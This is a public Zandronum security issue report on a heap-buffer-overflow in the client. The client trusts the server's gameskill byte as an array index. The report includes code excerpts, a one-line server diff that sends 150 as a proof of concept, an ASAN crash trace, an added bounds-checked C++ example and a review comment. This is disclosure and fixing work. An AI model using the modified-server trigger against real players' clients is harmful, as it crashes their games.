| Field | Value |
|---|---|
| ID | 0003828 |
| Project | Zandronum |
| Category | [All Projects] Security |
| View Status | public |
| Date Submitted | 2020-06-16 18:57 |
| Last Update | 2020-06-16 18:58 |
| Reporter | mmmds |
| Assigned To | |
| Priority | normal |
| Severity | crash |
| Reproducibility | always |
| Status | new |
| Resolution | open |
| Platform | x86-64 |
| OS | Ubuntu |
| OS Version | 18.04 |
| Product Version | 3.0 |
| Target Version | |
| Fixed in Version | |
| Summary | 0003828: Array index coming from the server (heap-buffer-overflow) |
Description:

During the match, the client receives the `gameskill` value from the server.

```
File: zandronum_build/zandronum/src/cl_main.cpp
1274: void CLIENT_ProcessCommand( LONG lCommand, BYTESTREAM_s *pByteStream )
1275: {
[...]
1482: case SVC_SETGAMESKILL:
1483:
1484: client_SetGameSkill( pByteStream );
1485: break;
1486: case SVC_SETGAMEDMFLAGS:
[...]
5574: static void client_SetGameSkill( BYTESTREAM_s *pByteStream )
5575: {
5576: UCVarValue Value;
5577:
5578: // Read in the gameskill setting, and set gameskill to this setting.
5579: Value.Int = NETWORK_ReadByte( pByteStream );
5580: gameskill.ForceSet( Value, CVAR_Int );
[...]
```

Later, this value is used as an index into the `AllSkills` array. The server can therefore cause the client to read data outside the buffer.

```
File: zandronum/src/g_skill.cpp
322: int G_SkillProperty(ESkillProperty prop)
323: {
324: if (AllSkills.Size() > 0)
325: {
326: switch(prop)
327: {
328: case SKILLP_AmmoFactor:
329: if (dmflags2 & DF2_YES_DOUBLEAMMO)
330: {
331: return AllSkills[gameskill].DoubleAmmoFactor;
332: }
333: return AllSkills[gameskill].AmmoFactor;
334:
335: case SKILLP_DropAmmoFactor:
336: return AllSkills[gameskill].DropAmmoFactor;
337:
338: case SKILLP_DamageFactor:
339: return AllSkills[gameskill].DamageFactor;
340:
341: case SKILLP_FastMonsters:
342: return AllSkills[gameskill].FastMonsters || (dmflags & DF_FAST_MONSTERS);
343:
[...]
```
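To make the defect and its fix concrete, here is an added example (not Zandronum's code) that models the client-side `SVC_SETGAMESKILL` handling described above: the unchecked read beside a bounds-checked one, followed by a lookup modelled on `G_SkillProperty`. `AllSkills`, `ByteStream`, the five constructed skill entries and all function names are stand-ins for the real `AllSkills` array, `BYTESTREAM_s`, `client_SetGameSkill` and `G_SkillProperty`.

```cpp
// Added example, not Zandronum's code: a minimal model of the client-side
// SVC_SETGAMESKILL handling, with the unchecked read beside a bounds-checked one.
// AllSkills, ByteStream and the function names are constructed stand-ins for the
// real AllSkills array, BYTESTREAM_s and client_SetGameSkill / G_SkillProperty.
#include <cstddef>
#include <cstdint>
#include <vector>

struct SkillInfo {
    int AmmoFactor;
    int DamageFactor;
    bool FastMonsters;
};

// Constructed stand-in for AllSkills: five entries, like the stock Doom skills.
static const std::vector<SkillInfo> AllSkills = {
    {2, 1, false}, {1, 1, false}, {1, 1, false}, {1, 1, false}, {1, 2, true},
};

// Minimal byte stream standing in for BYTESTREAM_s; readByte() returns -1 on a
// truncated packet instead of reading past the buffer.
struct ByteStream {
    std::vector<uint8_t> data;
    size_t pos = 0;
    int readByte() { return pos < data.size() ? data[pos++] : -1; }
};

// The reported behaviour: the byte from the wire becomes the index unconditionally.
// Any value >= AllSkills.size() (the PoC sends 150) later indexes outside the array.
void setGameSkillUnchecked(ByteStream& s, int& gameskill) {
    gameskill = s.readByte();
}

bool isValidSkillIndex(int idx) {
    return idx >= 0 && static_cast<size_t>(idx) < AllSkills.size();
}

// Hardened version: the server is untrusted input, so the index is validated
// before it is stored. On a bad value gameskill is left unchanged and the caller
// is told, so it can log the event or drop the connection.
bool setGameSkillChecked(ByteStream& s, int& gameskill) {
    const int v = s.readByte();
    if (!isValidSkillIndex(v)) return false;
    gameskill = v;
    return true;
}

// Feed one SVC_SETGAMESKILL payload byte through the checked path and return
// the resulting gameskill (unchanged when the byte was rejected).
int applySkillPacket(uint8_t wireByte, int currentSkill) {
    ByteStream s{{wireByte}};
    int gameskill = currentSkill;
    setGameSkillChecked(s, gameskill);
    return gameskill;
}

// Lookups modelled on G_SkillProperty's SKILLP_DamageFactor and
// SKILLP_FastMonsters cases. With a validated gameskill the index cannot leave
// AllSkills; an out-of-range value yields -1 / false instead of an OOB read.
int skillDamageFactor(int gameskill) {
    if (!isValidSkillIndex(gameskill)) return -1;
    return AllSkills[gameskill].DamageFactor;
}

bool skillFastMonsters(int gameskill) {
    return isValidSkillIndex(gameskill) && AllSkills[gameskill].FastMonsters;
}

int main() {
    int gameskill = 1;
    ByteStream hostile{{150}};  // constructed payload matching the PoC's value
    const bool accepted = setGameSkillChecked(hostile, gameskill);
    // accepted is false, gameskill is still 1 and the lookup stays in bounds
    return (!accepted && skillDamageFactor(gameskill) == 1) ? 0 : 1;
}
```

The check belongs on the receiving side: whatever the server sends is untrusted, so the index must be compared against the array's current size (which depends on the loaded MAPINFO/skill definitions) at the moment it is applied, not against a fixed constant.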
Steps To Reproduce:

PoC: modify the server's code to send a malicious value.

```
diff -r 10af1739daa3 src/sv_commands.cpp
--- a/src/sv_commands.cpp Sun Oct 13 21:38:53 2019 +0200
+++ b/src/sv_commands.cpp Thu Jun 11 11:44:37 2020 -0400
@@ -2091,7 +2091,7 @@
 void SERVERCOMMANDS_SetGameSkill( ULONG ulPlayerExtra, ServerCommandFlags flags )
 {
        NetCommand command( SVC_SETGAMESKILL );
- command.addByte( gameskill );
+ command.addByte( 150 );
        command.addByte( botskill );
        command.sendCommandToClients( ulPlayerExtra, flags );
 }
```
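Review bot: this hunk is the reporter's reproduction, not a fix: it replaces the `gameskill` argument of `command.addByte` with the constant 150, which is what lands in the client's `AllSkills[gameskill]` lookup. The corrective change belongs on the receiving side, in `client_SetGameSkill`, where the byte returned by `NETWORK_ReadByte` should be rejected (or clamped to a default) unless it is below `AllSkills.Size()` before `gameskill.ForceSet` is called, because the server cannot be trusted to send a valid index. The adjacent `botskill` byte travels the same unchecked wire path and is worth checking for the same validation on receipt.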
```
$ ./zandronum-server
```

The client (compiled with ASAN) crashes while connecting to the server.

```
$ ./zandronum -connect 127.0.0.1 10666
Gtk-Message: 11:42:31.959: Failed to load module "canberra-gtk-module"
Zandronum 3.0.1 - 191013-1938 - SDL version
Compiled on Jun 8 2020
Using video driver x11

M_LoadDefaults: Load system defaults.
Gameinfo scan took 0 ms
W_Init: Init WADfiles.
 adding /home/mmm/zandronum_build/zandronum/buildclient-asan/zandronum.pk3, 689 lumps
 adding /home/mmm/.config/zandronum/freedm.wad, 3655 lumps
I_Init: Setting up machine state.
CPU Vendor ID: GenuineIntel
  Name: Intel(R) Core(TM) i5-9300H CPU @ 2.40GHz
  Family 6, Model 158, Stepping 10
  Features: MMX SSE SSE2 SSE3 SSSE3 SSE4.1 SSE4.2
I_InitSound: Initializing FMOD
FMOD Sound System, copyright © Firelight Technologies Pty, Ltd., 1994-2009.
Loaded FMOD version 4.24.16
OSS could not be initialized. Trying ALSA.
V_Init: allocate screen.
Using in-memory database. The database will not be saved on exit.
S_Init: Setting up sound.
ST_Init: Init startup screen.
Checking cmd-line parameters...
S_InitData: Load sound definitions.
G_ParseMapInfo: Load map definitions.
Texman.Init: Init texture manager.
ParseTeamInfo: Load team definitions.
LoadActors: Load actor definitions.
R_Init: Init Doom refresh subsystem.
DecalLibrary: Load decals.
Adding dehacked patch freedm.wad:DEHACKED
Patch installed
PWO_Init: Initializing preferred weapon order.
M_Init: Init menus.
P_Init: Init Playloop state.
ParseSBarInfo: Loading default status bar definition.
ParseSBarInfo: Loading custom status bar definition.
===========================================================================
This is FreeDM, the free content deathmatch FPS.

FreeDM is freely redistributable under the terms of the modified BSD
license. Check out the Freedoom website for more information:

    https://freedoom.github.io/
============================================================================
D_CheckNetGame: Checking network game status.
player 1 of 1 (1 nodes)
Initializing network subsystem.
IP address 127.0.1.1:10667
UDP Initialized.
Resolution: 640 x 480
Connecting to 127.0.0.1:10666
Connecting to 127.0.0.1:10666
Connecting to 127.0.0.1:10666
Connected!
Authenticating level...
Level authenticated!


MAP01 - Tech Test

Requesting snapshot...
Receiving snapshot...
Version 3.0.1 Server
Starting MIDI playback failed
=================================================================
==8282==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000010864 at pc 0x561894094fa4 bp 0x7ffe782f9080 sp 0x7ffe782f9070
READ of size 1 at 0x61e000010864 thread T0
    #0 0x561894094fa3 in G_SkillProperty(ESkillProperty) /home/mmm/zandronum_build/zandronum/src/g_skill.cpp:342
    #1 0x56189432ab63 in AActor::isFast() /home/mmm/zandronum_build/zandronum/src/p_mobj.cpp:5210
    #2 0x561894327fb5 in AActor::StaticSpawn(PClass const*, int, int, int, replace_t, bool) /home/mmm/zandronum_build/zandronum/src/p_mobj.cpp:4905
    #3 0x561893edaa02 in Spawn(PClass const*, int, int, int, replace_t) /home/mmm/zandronum_build/zandronum/src/./actor.h:1315
    #4 0x561893f70823 in ServerCommands::SpawnPlayer::Execute() /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:3317
    #5 0x5618941290a9 in CLIENT_ParseServerCommand(tagSVC, BYTESTREAM_s*) /home/mmm/zandronum_build/zandronum/src/network/servercommands.cpp:289
    #6 0x561893f6768a in CLIENT_ProcessCommand(long, BYTESTREAM_s*) /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:1271
    #7 0x561893f6724c in CLIENT_ParsePacket(BYTESTREAM_s*, bool) /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:1235
    #8 0x561893f663a5 in CLIENT_GetPackets() /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:967
    #9 0x56189404f8a5 in G_Ticker() /home/mmm/zandronum_build/zandronum/src/g_game.cpp:1523
    #10 0x561893ffac6b in TryRunTics() /home/mmm/zandronum_build/zandronum/src/d_net.cpp:1903
    #11 0x561893fe58a2 in D_DoomLoop() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:1322
    #12 0x561893fee625 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:3278
    #13 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    #14 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #15 0x561893e97f69 in _start (/home/mmm/zandronum_build/zandronum/buildclient-asan/zandronum+0x524f69)

0x61e000010864 is located 28 bytes to the left of 2817-byte region [0x61e000010880,0x61e000011381)
freed by thread T0 here:
    #0 0x7fce114a7480 in operator delete[](void*) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe1480)
    #1 0x561894b0341b in CheckIfPatch /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:119
    #2 0x561894b034e5 in PatchTexture_TryCreate(FileReader&, int) /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:136
    #3 0x561894b11af1 in FTexture::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texture.cpp:107
    #4 0x561894b18455 in FTextureManager::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:402
    #5 0x561894b18df1 in FTextureManager::AddGroup(int, int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:504
    #6 0x561894b1b19f in FTextureManager::AddTexturesForWad(int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:816
    #7 0x561894b1c06c in FTextureManager::Init() /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:979
    #8 0x561893fed240 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:2970
    #9 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    #10 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

previously allocated by thread T0 here:
    #0 0x7fce114a6608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608)
    #1 0x561894b0318b in CheckIfPatch /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:88
    #2 0x561894b034e5 in PatchTexture_TryCreate(FileReader&, int) /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:136
    #3 0x561894b11af1 in FTexture::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texture.cpp:107
    #4 0x561894b18455 in FTextureManager::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:402
    #5 0x561894b18df1 in FTextureManager::AddGroup(int, int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:504
    #6 0x561894b1b19f in FTextureManager::AddTexturesForWad(int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:816
    #7 0x561894b1c06c in FTextureManager::Init() /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:979
    #8 0x561893fed240 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:2970
    #9 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    #10 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/mmm/zandronum_build/zandronum/src/g_skill.cpp:342 in G_SkillProperty(ESkillProperty)
Shadow bytes around the buggy address:
  0x0c3c7fffa0b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa0c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa0d0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3c7fffa0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3c7fffa0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c3c7fffa100: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
  0x0c3c7fffa110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable: 00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone: fa
  Freed heap region: fd
  Stack left redzone: f1
  Stack mid redzone: f2
  Stack right redzone: f3
  Stack after return: f5
  Stack use after scope: f8
  Global redzone: f9
  Global init order: f6
  Poisoned by user: f7
  Container overflow: fc
  Array cookie: ac
  Intra object redzone: bb
  ASan internal: fe
  Left alloca redzone: ca
  Right alloca redzone: cb
==8282==ABORTING
```
Additional Information:

Environment:
- Ubuntu 18.04
- Zandronum version 3.0.1
```
$ hg summary
parent: 10174:10af1739daa3 ZA_3.0.1
```
- ASAN compilation
```
cmake .. -DCMAKE_BUILD_TYPE=Debug -DSERVERONLY=ON -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
ASAN_OPTIONS=detect_leaks=0 make -j4
```
Notes:

There are no notes attached to this issue.


Issue History:

| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2020-06-16 18:57 | mmmds | | New Issue |